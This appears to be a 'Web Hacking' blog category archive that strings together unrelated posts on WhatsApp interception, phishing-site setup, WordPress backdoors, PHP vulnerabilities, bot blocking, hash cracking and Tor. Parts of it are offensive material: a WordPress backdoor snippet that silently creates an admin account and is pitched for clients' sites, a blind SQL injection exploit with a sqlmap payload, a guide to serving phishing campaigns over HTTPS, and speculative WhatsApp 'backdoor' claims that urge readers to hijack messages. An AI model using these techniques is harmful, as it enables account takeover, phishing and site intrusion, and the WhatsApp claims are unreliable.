Category Archives: (K) Web Hacking

Hack whatsapp messages without access to phone

WhatsApp Tracker allows Hackers to Intercept and Read Your Encrypted Messages

This method is perhaps the most appealing of them all. In essence, it uses a “backdoor” flaw.

Some say it is a severe mistake, while others claim it is an additional feature.

Anyway, it allows to you to hack Whatsapp and to read, by intercepting the messages between users. Backdoor is used by Whatsapp, Telegram, and a few more apps.

First of all, we should explain the end-to-end encryption. It means that you, as a user will send an encrypted message to another person.

Only after it is received, it will be decrypted and readable. Whatsapp introduced this feature in 2012 and then became the most secure app of them all. Sadly, it looks like it isn’t so secure.

Whatsapp is owned by Facebook, and if we know that this giant allows to the central intelligence agencies to spy on their users, we can deduce that Whatsapp shares the same flaw.

That’s why the backdoor feature exists. Originally, it has been developed for central intelligence agencies, but at the same time, it is something that hackers can use.

Furthermore, Whatsapp end-to-end encryption works on “trust”. The company uses a secure server to process the messages, but according to the user agreement, they can change any of the rules at any given moment.

Basically, Whatsapp can choose to share your messages with others and you won’t know about it!

How this actually works?

The vulnerability relies on the way WhatsApp behaves when an end user’s encryption key changes.

Basically, we have a scenario between users A and a person B.

When a person A sends a few messages to the person B, the Whatsapp on that device will decrypt the messages and allow for the user to read them.

But, when a user B replaces the device, he will also be able to get and read those messages.

This is possible due to the fact Whatsapp choose to update and modify the private keys, needed for decryption at any given moment, without informing the user.

Now, you as a hacker will be user C. You will modify the private key of a user B and insert your own.

By doing so, you will directly be able to read messages of user A. Whatsapp spy app that can do it for you isn’t so complicated to use, after all.

Here we have another advantage of this method. Facebook, which owns Whatsapp didn’t solve this issue since 2016. It is obvious that it will stay available in the future as well.

All of this means that you, as a hacker will be able to exploit this method in the near future. Using Whatsapp tracker online and using this method will give impressive results.

Some believe that backdoor feature is used as a feature to eliminate the need for constant privacy key verification, which is annoying. Instead, Whatsapp will do it instead of you.

But, Signal private messenger, which uses the same technology is immune to this issue, simply due to the fact it requires physical verification.

If you are a decent hacker, you will be able to exploit this method or better said this drawback of the Whatsapp.

After all, it is introduced to allow for agencies to spy on users, which means that hackers, including yourself, can use it for the same reason.



Take this a step further; HTTPS should be implemented on all your phishing sites regardless if they harvest sensitive data or not. You’ve got a much better chance of bypassing any web proxy servers in place by running a full encrypted stream.

Phishing Frenzy now supports using an SSL Certificate and hosting your websites over HTTPS. Since Phishing Frenzy is essentially a front end for the Apache web service, you can upload your SSL certificate, activate the campaign and watch it all come to life over HTTPS. Now that’s legit.

How it Works

Let’s Encrypt has a nifty command line tool that we can run from our phishing server to quickly obtain our valid SSL certificate. The command line tool has now been renamed to “certbot” and can be downloaded off github here:

Once you’ve downloaded the script onto your server, it’s really a one-liner to get the SSL certificate in your possession.

The first item to note is that Apache cannot be running while you run certbot. In order for Let’s Encrypt to validate that you own the domain, it will resolve the FQDN to an IP address of the server you are currently on. Certbot will then start up a mini web service hosting a token which proves to Let’s Encrypt that you’re authoritative over this domain name.

This means that if you have any active phishing campaigns they would be disabled temporarily while you obtain the SSL certificate. Keep this in mind to make sure you’re not disrupting an active campaign of yours or a colleague.


If you try to invoke the certbot script with Apache running you’ll be notified with a nice little warning like below:

SSL Certificate - Apache Already Running

So once you’ve properly disabled your active web server, you can then run the “certbot” command similar to below. Make sure to tweak this for the domain name that you’re configuring.

./certbot-auto certonly –standalone –d

The standalone flag is used to tell the “certbot” tool that you want it to run a mini web service to properly authenticate with Let’s Encrypt by hosting a web page temporarily. The “certonly” flag is used to tell “certbot” that you don’t want the tool to automatically configure Apache with the SSL certificate. Just provide us the certificate, and we’ll deploy them to Apache ourselves through the Phishing Frenzy Web UI.

Once you’ve invoked this successfully, you are the new proud owner of some valid SSL certificates; Congratulations. By default all of the certificates will be dropped to the /etc/letsencrypt/live/:fqdn which is really a symbolic link to the /etc/letsencrypt/archive/:fqdn directory as seen below:



Now that we have all of the SSL files required to host our phishing site over HTTPS.  Let’s start Apache back up and jump back over to our campaign within Phishing Frenzy. All we need to do is upload the SSL certificate as seen below and save. Make sure to assign the proper cert, key and chain properly using the dropdowns on the right.


Once this data has been uploaded and saved to the campaign properly, you can then activate the campaign and your phishing site is now live over HTTPS.  Anyone who tries to hit the phishing site over HTTP will be automatically redirected to HTTPS by default.



If you’re not leveraging HTTPS for all your phishing engagements you should be. is a great service and is changing the world of SSL certificate authorities. It’s no cost to you, and the tools are really slick to auto-magically configure your Nginx or Apache web server with a couple added flags.

In the future we may incorporate Let’s Encrypt into the Web UI itself so that it communicates with the Let’s Encrypt API to pull down the SSL certificate and apply it to the current campaign.

Hope you enjoyed, and enjoy phishing all the things over HTTPS.

How is backdoor created in WordPress ?

When the front door is closed, you might try the backdoor. This might sound like a malicious way of using the code for entering the site without having the access to it, but there are actually times when you need to control your own site if somebody stole it.

No matter how many times this thief deletes your information or restores a backup on a server he probably owns, there is a chance he doesn’t know anything about backdoor entrances. If he did, he probably wouldn’t even need your help in setting up WordPress, right?

Create a backdoor:

OK, enough with the talk; here’s a piece of code you will need to get the job done:

  1. Open functions.php file
  2. Copy/Paste following code:
add_action('wp_head', 'wplo_backdoor'); 
function wploop_backdoor() {
        If ($_GET['backdoor'] == 'hellomoto') {
                If (!username_exists('username')) {
                        $user_id = wp_create_user('name', 'pass');
                        $user = new WP_User($user_id);
  1. Save changes

If you leave the code as it is, all you would have to do to create a new admin on the site is visit

After the page was loaded, your new username is “name” and password “pass”.

Of course, you can change that in the code above by changing ‘name’ and ‘pass’ to whatever you want. You can also change the link to your back door by changing ‘backdoor’ and/or ‘hellomoto’ to anything you come up with.

Try the function – not only it is fun but it can really help you sometime in the future when you’re about to create a site for someone you can’t trust completely.




Alternatives to Tor Browser for Anonymous Browsing

Here is best anonymous browsing browsers that are better that TOR browser. List of browsers are given select any and download and use to have private browsing in your computer.

Best Alternatives to Tor Browser for Anonymous Browsing

1. I2P

I2P is an anonymous per to peer-to-peer distributes communication layer which is for open source tools. The software implementing this computer network layer is called I2P layer such as P2P software. Specially, it is designed for security services and is compatible faster than Tor and is full on alternative to TOR . It’s self oranising and distributed potential.

2. Freenet

Freenet is considered as a peer-to-peer to dislike the censorship same as to I2P.It utilizes the similar P2P tools of diffusing data storage to distribute and keep the information but divide the set of rules of user interface and network structure. It comes out with two-tier safety measures such as Darknet and Opennet.

3. Freepto

Freepto is a dissimilar Linux-based Operating System that is booted using a USB Disk on any PC. It is easy to run and is faster in saving your encrypted data. The data is encrypted which is put it into your disk. It offers hacktivists the straightwforward way to communicate in the similar way as Tor.

4. JonDo Live-CD

JonDo Live-CD , one of the Linux based OS that provides you pre-configured applications to be used for web surfing. It includes Thinderbird, Torbrowser, and may other programs.

5. Tox

Tox is considered not a complete standby for Tor, but helps in providing you the messaging services. It provides you many more advanced features as private and encrypted IM, video conferencing and calls i.e. a user- friendly browser.

6. Lightweight Portable Security (LPS)

It creates a safe passage between end nodes from dependable media on any nearly located Intel-based PC. It also boot up CD from Linux operating system. Administrator benefits are not required and not anything is installed.

7. IprediaOS

Ipredia OS is a fast, commanding and firm opertaing system that is totally based on Linux that provides you an unspecified environment. All the traffic is encrypted and anonymized. Many apps are available in Ipredia OS, can be in any form as mail, peer-to-peer, bittorrent.

How to Prevent Hackers from Using Bad Bots To Exploit Your Website


(Image created by the author)

The Bot Bandits Are Out of Control

I’ve always known that bots crawl my websites and the sites of all my fellow developers, but I was unaware that bots now make more visits than people do to most websites. Yep, they officially overtook us in 2012, and bots now dominate website visits. Egad, it’s Star Wars run amok!

Before we become alarmed, though, let’s look at a few facts that demonstrate the preponderance of bots in our midst.

The bots are coming. The bots are coming. The bots are here!

(Image source)

Incapsula’s 2013 bot traffic report states that “Bot visits are up 21% to represent 61.5% of all website traffic.” If bots are preponderant, what does that mean for us?

For those of you just tuning in, preponderance means “the quality or fact of being greater in number, quantity, or importance.” That means the bots are “more important than humans” in determining the value of websites to potential readers.

A quick look at antonyms for preponderance reveals that our plight is worse than expected. Antonyms for preponderance include disadvantage, inferiority, subordination, subservience, surrender and weakness.

All is not lost, however. Not all bots are bad. In fact, in the wild and woolly world of SEO, Googlebots are actually our friends. A “Googlebot” is Google’s web crawling bot, also known as a “spider,” that crawls the Internet in search of new pages and websites to add to Google’s index.

Googlebots: Our Ally in the Bot Wars

If we think of the web as an ever-growing library with no central filing system, we can understand exactly what a Googlebot wants. A Googlebot’s mission is to crawl this library and create a filing system. Bots need to be able to quickly and easily crawl sites. When a Googlebot arrives at your site, its first point of access is your site’s robot.txt file, which highlights the importance of ensuring it’s easy for the bots to crawl your robots.txt file. The less time Googlebots spend on irrelevant portions of your site, the better. At the same time, be sure you have not inadvertently siloed or blocked pages of your site that should not be blocked.


(Image source)

Next, Googlebots use the sitemap.xml file to discover all areas of your site. The first rule of thumb is this: keep it simple. Googlebots do not crawl DHTML, Flash, Ajax nor JavaScript as well as they crawl HTML. Since Google has been less than forthcoming about how its bots crawl JavaScript and Ajax, avoid using this code for your site’s most important elements. Next, use internal linking to create a smart, logical structure that will help the bots efficiently crawl your site. To check the integrity of your internal linking structure, go to Google Webmaster Tools -> Search Traffic -> Internal Links. The top-linked pages should be your site’s most important pages. If they aren’t, you need to rethink your linking structure.

So, how do you know if the Googlebots are happy? You can analyze Googlebot’s performance on your site by checking for crawl errors. Simply go to Webmaster Tools -> Crawl and check the diagnostic report for potential site errors, URL errors, crawl stats, site maps and blocked URLs.

The Enemy in our Midst: Bandit Bots

Googlebots aren’t the only bots visiting your site. In fact, over 38% of the bots crawling our sites are out for no good. So not only are we out-numbered, but nearly 2 out of every 5 visitors to your site are trying to steal information, exploit security loopholes and pretend to be something they are not.

We’ll call these evil bots “bandit bots”.

So, what are we to do?

As an SEO provider and website developer, I could protest. I could blog my little heart out and get a few friends to join me. Or I could buckle down and take responsibility for my own little corner of the web and fight back against the bandit bots.

Let’s do this together.

Bandit Bots: What They Are and How to Fight BackTerminator-Robot-dreamstime_s_34845625-C

The bad guys come in four flavors. Learn which bots to watch out for and how to fight back.


These bandit bots steal and duplicate content, as well as email addresses. Scraper bots normally focus on retrieving data from a specific website. They also try to collect personal information from directories or message boards. While scraper bots target a variety of different verticals, common industries include online directories, airlines, e-commerce sites and online property sites. Scraper bots will also use your content to intercept web traffic. Additionally, multiple pieces of scraped content can be scrambled together to make new content and allow them to avoid duplicate content penalties.

What’s at risk: Scrapers grab your RSS feed so they know when you publish content. However, if you don’t know that your site is being attacked by scrapers, you may not realize there’s a problem. In the eyes of Google, however, ignorance is no excuse. Your website could be hit by severe penalties for duplicate content and even fail to appear in search engine rankings.

How to fight back: Be proactive and attentive to your site, thus increasing the likelihood that you can take action before severe damage is done.

There are two good ways to identify if your site is the victim of a scraper attack. One option is to use a duplicate-content detection service like Copyscape to see if any duplicate content comes up.


(Image created by the author)

A second option for alerting you that content might have been stolen from your site is to use trackbacks within your own content. In general, it’s good SEO to include one or two internal site links within your written content. When you include these links, be sure to activate WordPress’s trackback feature. In the trackback field on your blog’s entry page, simply enter the URL of the article you are referencing. (In this case, it will be one on your own websites, not another site).



(Image created by the author)

You can manually look at your trackbacks to see what sites are using your links. If you find that your content has been re-posted without your permission on a spam site, file a DMCA-complaint with Google.

Finally, if you know the IP address from which scraper bots are operating, you can block them from your feed directly. Add the following code to your .htaccess files. Learn how to edit your .htaccessfile. (See editing your .htaccess file on WordPress.)

RewriteEngine on
RewriteCond %{REMOTE_ADDR} ^
RewriteRule ^(.*)$

In this example, is the IP address you want to send to and is the custom content you want to send them.

Warning! Be very careful editing this file. It could break your site if done incorrectly. If you are unsure of how to edit this file, ask for help from a web developer.

Hacking Tools

Hacking bandit bots target credit cards and other personal information by injecting or distributing malware to hijack a site or server. Hacker bots also try to deface sites and delete critical content.

What’s at risk: It goes without saying that should your site be the victim of a hacking bot, your customers could lose serious confidence in the security of your site for e-commerce transactions.

How to fight back: Most of the attacked sites are victims of “drive-by hackings,” which are site hackings done randomly and with little regard for the impacted business. To prevent your site from becoming a hacking victim, make a few basic modifications to your .htaccess file, which is typically found in the public_html directory. This is a great starter list of common hacking bots. Copy and paste this list into the .htaccess file to block any of these bots from accessing your site. You can add bots, remove bots and otherwise modify the list as necessary.


Spam bots load sites with garbage to discourage legitimate visits, turn targeted sites into link farms and bait unsuspecting visitors with malware/phishing links. Spam bots also participate in high volume spamming in order to cause a website to be blacklisted in search results and destroy your brand’s online reputation.

What’s at risk: Failure to protect your site from spammers can cause your website to be blacklisted, destroying all your hard work at building a credible online presence.

How to fight back: Real-time malicious traffic detection is critical to your site’s security, but most of us don’t have the time to simply sit around and monitor our site’s traffic patterns. The key is to automate this process.

If you’re using WordPress, one of the first steps to fighting back against spam bots is to stop spam in the first place. Start by installing Akismet; it is on all my personal sites as well as the sites I manage for my client. Next, install a trusted security plugin and setup automatic backups of your database.


(Image create by the author)

Require legitimate registration with CAPTCHAs for all visitors who want to make comments or replies. Finally, follow to learn what’s new in the world of security.

Click Frauders

Click fraud bots make PPC ads meaningless by “clicking” on the ads so many times you effectively spend your entire advertising budget, but receive no real clicks from interested customers. Not only do these attacks drain your ad budget, they also hurt your ad relevance score for whatever program you may be using. Google AdWords and Facebook ads are the most frequent targets of these attacks.

What’s at risk: Click fraud bots waste your ad budget with meaningless clicks and prevent interested customers from actually clicking on your ad. Worse, your Ad Relevance score will plummet, destroying your credibility and making it difficult to compete for quality customers in the future.

How to fight back: If your WordPress site is being targeted by click fraud bots, immediately download and install the Google AdSense Click Fraud monitoring plugin. The plugin counts all clicks on your ads. Should the clicks exceed a specified number, the IP address for the clicking bot (or human user) is blocked. The plugin also blocks a list of specific IP addresses. The plugin is specifically for the Adsense customers to install on their websites; AdWords customers have no capabilities to implement this plugin.


(Image created by the author)

When defending a website from hacker bots, it takes a concentrated effort to thwart their attacks. While the above steps are important and useful, there are some attacks, like coordinated DDoS, that you simply cannot fight off on your own. Fortunately, a number of tech security companies specialize in anti-DDoS tools and services. If you suspect your site (or one of your client’s sites) is being targeted for DDoS, such companies can be key to a successful defense.

I recommend following to learn what’s new in the world of security.


Giving honest Googlebots what they want is quite simple. Develop strong, relevant content and publish regularly. Combatting the fake Googlebots and other bot bandits is a bit tougher. Like many things in life, it requires diligence and hard work.

Meet Apache Spot, a new open source project for cybersecurity

The effort taps big data analytics and machine learning for advanced threat detection

strata apache spot hadoop
The Apache Spot project was announced at Strata+Hadoop World on Wednesday, Sept. 28, 2016.

Credit: Katherine Noyes

Hard on the heels of the discovery of the largest known data breach in history, Cloudera and Intel on Wednesday announced that they’ve donated a new open source project to the Apache Software Foundation with a focus on using big data analytics and machine learning for cybersecurity.

Originally created by Intel and launched as the Open Network Insight (ONI) project in February, the effort is now called Apache Spot and has been accepted into the ASF Incubator.

“The idea is, let’s create a common data model that any application developer can take advantage of to bring new analytic capabilities to bear on cybersecurity problems,” Mike Olson, Cloudera co-founder and chief strategy officer, told an audience at the Strata+Hadoop World show in New York. “This is a big deal, and could have a huge impact around the world.”

Based on Cloudera’s big data platform, Spot taps Apache Hadoop for infinite log management and data storage scale along with Apache Spark for machine learning and near real-time anomaly detection. The software can analyze billions of events in order to detect unknown and insider threats and provide new network visibility.

Essentially, it uses machine learning as a filter to separate bad traffic from benign and to characterize network traffic behavior. It also uses a process including context enrichment, noise filtering, whitelisting and heuristics to produce a shortlist of most likely security threats.

By providing common open data models for network, endpoint, and user, meanwhile, Spot makes it easier to integrate cross-application data for better enterprise visibility and new analytic functionality. Those open data models also make it easier for organizations to share analytics as new threats are discovered.

Other contributors to the project so far include eBay, Webroot, Jask, Cybraics, Cloudwick, and Endgame.

“The open source community is the perfect environment for Apache Spot to take a collective, peer-driven approach to fighting cybercrime,” said Ron Kasabian, vice president and general manager for Intel’s Analytics and Artificial Intelligence Solutions Group. “The combined expertise of contributors will help further Apache Spot’s open data model vision and provide the grounds for collaboration on the world’s toughest and constantly evolving challenges in cybersecurity analytics.”

Top 6 security attacks in PHP

Be aware of the most common security threats to PHP applications is the important step to secure your PHP scripts may not be immune.  Here, the article is going to go over top 6 common security threads in PHP scripts. You may familiar with this, if not, this is a good time for you to read and keep in mind.

1. SQL injection

SQL injection is a kind of attack that malicious users enter SQL in form fields in a way that affects the execution of SQL statements. A variation is command injection, where user data is passed through system() or exec(). It shares the same mechanism as SQL injection but for shell commands.

1     $ username = $_POST[‘username’];

2     $query = “select * from auth where username = ‘”.$username.”‘”;

3     echo $query;

4     $db = new mysqli(‘localhost’, ‘demo’, ‘demo’, ‘demodemo’);

5     $result = $db->query($query);

6     if ($result && $result->num_rows) {

7         echo “<br />Logged in successfully”;

8     } else {

9         echo “<br />Login failed”;

10   }

The above code, there is not proper filtered/escaped on user input value ($_POST[‘username’]) on Line 1. This query could fail or even damage the DB if $username has a wrong format or contains substrings that transform your SQL statement to something else.

Preventing SQL injection


  • Filter data using mysql[i]_real_escape_string()
  • Manually check each piece of data is of the right type
  • Use prepared statements and bind variables

Use prepared prepared statements

  • Separating data and SQL logic
  • The prepared statements will do filtering (e.g., escape) automatically
  • Use it as a coding standard, can help limit problems caused by new developers within your organization.
1    $query = ‘select name, district from city where countrycode=?’;

2    if ($stmt = $db->prepare($query) )

3   {

4         $countrycode = ‘hk’;

5         $stmt->bind_param(“s”, $countrycode);

6         $stmt->execute();

7         $stmt->bind_result($name, $district);

8         while ( $stmt ($stmt->fetch() ){

9            echo $name.’, ‘.$district;

10          echo ‘<br />’;

11        }

12        $stmt->close();

13   }


2. XSS

XSS (Cross Site Scripting) is an attack by a user where they enter some data to your website that includes a client side script (generally JavaScript). If you output this data to another web page without filtering it, this script will be executed.

Accept text comments from user

1    <?php

2      if (file_exists(‘comments’)) {

3          $comments = get_saved_contents_from_file(‘comments’);

4       } else {

5          $comments = ”;

6       }


8       if (isset($_POST[‘comment’])) {

9           $comments .= ‘<br />’ . $_POST[‘comment’];

10         save_contents_to_file(‘comments’, $comments);

11     }

12     ?>

Outputting comments to (another) user:

1     <form action=’xss.php’ method=’POST’>

2         Enter your comments here: <br />

3         <textarea name=’comment’></textarea> <br />

4         <input type=’submit’ value=’Post comment’ />

5         </form><hr /><br />


7       <?php echo $comments; ?>

What’s going to happen??

  • Annoying popups
  • Refresh or redirections
  • Corrupted pages or forms
  • Steal cookies
  • AJAX ( XMLHttpRequest )
Preventing XSS

In order to prevent XSS attact, proper filter output to the browser through htmlentities() in PHP. Basic usage of htmlentities() is simple, but there are many advanced controls. See the XSS cheat sheet at here.

3. Session fixation

Session security works on the assumption that a PHPSESSID is hard to guess. However, PHP can either accept a session id through a cookie or through the URL. Tricks a victim to use a specific (or another) session

ID or a phishing attack is possible.

Session fixation - A typical session fixation attack

4. Session capturing and hijacking

It’s the same idea of Session fixation, however, it involves stealing the session ID. If session IDs are stored in cookies, attackers can steal them through XSS and JavaScript. Session IDs can also be sniffed or obtained from proxy servers if contained in the URL.

Preventing Session capturing and hijacking

  • Regenerate IDs
  • If using sessions, always user SSL
5. Cross Site Request Forgeries (CSRF)

CSRF refers to a request for a page that looks like it was initated by a site’s trusted users, but wasn’t deliberately. Many variations. One of the example:

<img src=’′>

Preventing Cross Site Request Forgeries

In general make sure the users come from your forms, and each form submission is matched to an individual form that you send out. There are two guides have to remember:

  • User session with appropiate security measures, e.g.: Regenerate IDs and user SSL for every session.
  • Generate another one-time token and embed it in the form, save it in the session (one of the session variable), and check it on submission.
6. Code injection

Code injection is the exploitation of a computer bug that is caused by processing invalid data. The problem occurs when you accidentally execute arbitrary code, typically through file inclusion. Poorly written code can allow a remote file to be included and executed. Many PHP functions such as require can take an URL or a filename. Example:

1  <form>Choose theme:

2  <select name = theme>

3  <option value = blue>Blue</option>

4  <option value = green>Green</option>

5  <option value = red>Red</option>

6  </select>

7  <input type = submit>

8   </form>

9   <?php

10   if($theme) {

11     require($theme.’.txt’);

12    }

13 ?>

The example on above, Passing user input as a filename or part of a filename invites users to start filenames with “http://”.

Prevent Code Injection

  • Filter user input
  • Disable allow_url_fopen and/or allow_url_include setting in php.ini.  This disables require/include/fopen of remote files.
Other general principles
  • Don’t rely on server configuration to protect you especially if your web server/PHP is managed by your ISP, or if your web site might bebe migrated/deployed somewhere else in future migrated/deployed somewhere else in future. Embed the security-aware checking/logic in the website code (PHP, HTML, JavaScript, etc.)
  • Design your server-side scripts with security from the ground up: e.g., use a single line of execution that begins with a single point of authentication and data cleaning

    – E.g., delegate all login/security checking logic in one PHP function/file to be included in all security-sensitive pages

    – Problems can be easily checked and solved

  • Keep your code up to date.  Stay on top of patches and advisories

SimplePHPQuiz Blind SQL Injection

# Exploit Title: SimplePHPQuiz - Blind SQL Injection
# Date: 2016-08-23
# Exploit Author: HaHwul
# Exploit Author Blog:
# Vendor Homepage:
# Software Link:
# Version: [app version] (REQUIRED)
# Version: Latest commit
# Tested on: Debian [wheezy]

### Vulnerability
1-1. Nomal Request
POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1
Content-Length: 96


1-2 Response
   <div class="container theme-showcase" role="main">Your quiz has been saved <div class="footer">
 	<p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p>

2-1 Attack Request 1
POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1
Content-Length: 96


2-2 Response
    <div class="container theme-showcase" role="main"><h1>System Error</h1> <div class="footer">
 	<p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p>

3-1 Attack Request 2
POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1
Content-Length: 96


3-2 Response
   <div class="container theme-showcase" role="main">Your quiz has been saved <div class="footer">
 	<p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p>

### Weak Parameters
correct_answer parameter
question parameter
wrong_answer1 parameter
wrong_answer2 parameter
wrong_answer3 parameter

### SQLMAP Result
#> sqlm -u "" --data="question=0000&correct_answer=99aaa99&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit" --risk 3 --dbs --no-cast -p correct_answer


POST parameter 'correct_answer' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection points with a total of 117 HTTP(s) requests:
Parameter: correct_answer (POST)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: question=0000&correct_answer=99aaa99' AND (SELECT * FROM (SELECT(SLEEP(5)))FvVg) AND 'ZQRo'='ZQRo&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit
[17:52:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.10


IGHASHGPU – GPU Based Hash Cracking – SHA1, MD5 & MD4

IGHASHGPU is an efficient and comprehensive command line GPU based hash cracking program that enables you to retrieve SHA1, MD5 and MD4 hashes by utilising ATI and nVidia GPUs.

IGHASHGPU - GPU Based Hash Cracking - SHA1, MD5 & MD4

It even works with salted hashes making it useful for MS-SQL, Oracle 11g, NTLM passwords and others than use salts.

IGHASHGPU is meant to function with ATI RV 7X0 and 8X0 cards, as well as any nVidia CUDA video cards, providing a variable speed in accordance with the users GPU. The program also features a ‘-cpudontcare’ command that allows you to tell IGHASHGPU that it can use the maximum level of GPU, without any particular regard for CPU usage.

At the same time, you can set a temperature threshold for tracking your hardware (’-hm’), so you can make sure to desist any activity that causes your system to go over the permitted value (the default is 90 degrees Celsius).

It also has a feature that lets you set the block size so as to adjust the video response time and reduce any possible lags; if on the other hand, this is a characteristic that does not bother you in any particular way, you can input a higher value (as IGHASHGPU supports block sizes ranging between 16 and 23).

Hashes Supported for Cracking

As IGHASHGPU supports salted hashes it’s possible to use it for:

  • Plain MD4, MD5, SHA1.
  • NTLM
  • Domain Cached Credentials
  • Oracle 11g
  • MySQL5
  • vBulletin
  • Invision Power Board


Supported Cards/Requirements

  • Only currently supported ATI cards are:
    • HD RV7X0
    • RV830/870
    • 4550
    • 4670
    • 4830
    • 4730
    • 4770
    • 4850
    • 4870
    • 4890
    • 5750
    • 5770
    • 5850
    • 5870
  • Catalyst 9.9+ must be installed.
  • Only supported nVidia cards are the ones with CUDA support, i.e. G80+.
  • Systems with multiple GPUs supported.
    ighashgpu.exe [switch:param] [hashfile.txt]
    -c             csdepa Charset definition (caps, smalls (default), digits, special, space, all)
    -u             [chars] User-defined characters
    -uh           [HEX] User-defined characters in HEX (2 chars each)
    -uhh         [HEX] User-defined characters in Unicode HEX (4 chars each)
    -uf            [filename] Load characters from file. Not used with Unicode.
    -sf            [password] Password to start attack from
    -m           [mask] Password mask
    -ms         [symbol] Mask symbol
    -salt        [hex] Append salt after password
    -asalt      [string] Append salt in ascii after password
    -usalt      [string] Append salt in unicode after password
    -ulsalt     [string] Same as above but unicode string firstly transformed to lower case
    -min       [value] Minimum length (default == 4), must be >= 4
    -max      [value] Maximum length (default == 6), must be <= 31 (not counting salt length)
    -h           [hash] Hash to attack (16 or 20 bytes in HEX)
    -t            [type] Type of hash to attack
    -devicemask:[N] Bit mask for GPUs usage, bit 0 == first GPU (default 0xFF, i.e. all GPUs). 
    -cpudontcare Tell ighashgpu that you want maximum from GPU and so don't care about CPU usage at all (and it means one CPU core at 100% per one GPU).
    -hm               [N] Set threshold temperature for hardware monitoring, default is 90C. You can disable monitoring by setting this value to zero.
    -blocksize     [N] Set block size, by default N = 23 which means 2^23 = 8388608 passwords offloaded to GPU in a single batch.
    By default charset processed as ANSI one. (i.e. WideCharToMultiByte(CP_ACP, ...) You can change this with: 
    -unicode  Use unicode
    -oem        Use oem encoding
    -codepage  [page] Convert charset to specific codepage (need to have it at system of course


    You can download IGHASHGPU here:

How to access Tor, even when your country says you can’t

Censorship is nothing new, but as many governments and law enforcement agencies tighten the noose, anti-surveillance solutions need to get creative.

The Tor Project, which runs the anti-surveillance Tor network, is one such being.

The non-profit runs a network designed to disguise the original locations of users through traffic and relay points, and is often used by journalists, activists, and those attempting to circumvent censorship.

Nima Fatemi, an independent security research and member of the Tor Project, highlighted in a recent blog post how users in countries such as China, Saudi Arabia, and Iran can still try to access the network.

As noted by Motherboard, governments including Saudi Arabia, Bahrain, Iran, Russia, and China often attempt to block the use of virtual private networks (VPNs) in an effort to keep an eye on their citizen’s online activities.

However, blocking Tor is a more complicated problem due to the use of volunteer-ran nodes and relays used to reroute traffic and disguise original IP addresses.

According to Fatemi, the Tor Browser spoofs the UserAgent identity feature to make users look alike and avoid spying, as well as fingerprint attacks. However, Tor is still an open network where anyone can get a list of relay points — and so governments can simply block them.

“They can simply get the list of Tor relays and block them,” Fatemi noted. “This bars millions of people from access to free information, often including those who need it most. We at Tor care about freedom of access to information and strongly oppose censorship.”

As a result, Tor has developed what the organization called Pluggable Transports (PTs). PTs are a type of “bridge” into the Tor network which “make encrypted traffic to Tor look like not-interesting or garbage traffic,” according to the developer.

If users already want to try out this censorship-thwarting tool, they are in luck — as PTs are already included in the Tor Browser.

Tor has provided a step-by-step guide, as shown in the image below:


If you need additional bridges, you can email the project here or visit the BridgeDB website.


Tor has hit the spotlight recently after a scandal involving one of the “core” members of the project’s development team rocked the very foundations of the organization. Jacob Appelbaum, a 33-year-old developer, stepped down from his position after being accused ofalleged inappropriate sexual misconduct.

While Appelbaum has denied the claim as a “calculated and targeted attack,” an investigation conducted by an external law firm found that “many people inside and outside the Tor Project have reported incidents of being humiliated, intimidated, bullied, and frightened by Jacob,” according to Tor executive director Shari Steele.

As a result of the scandal, the full Tor board has been replaced with new faces including security expert Bruce Schneier, executive director of the Electronic Frontier Foundation (EFF) Cindy Cohn, and Matt Blaze, a computer and information science professor at the University of Pennsylvania.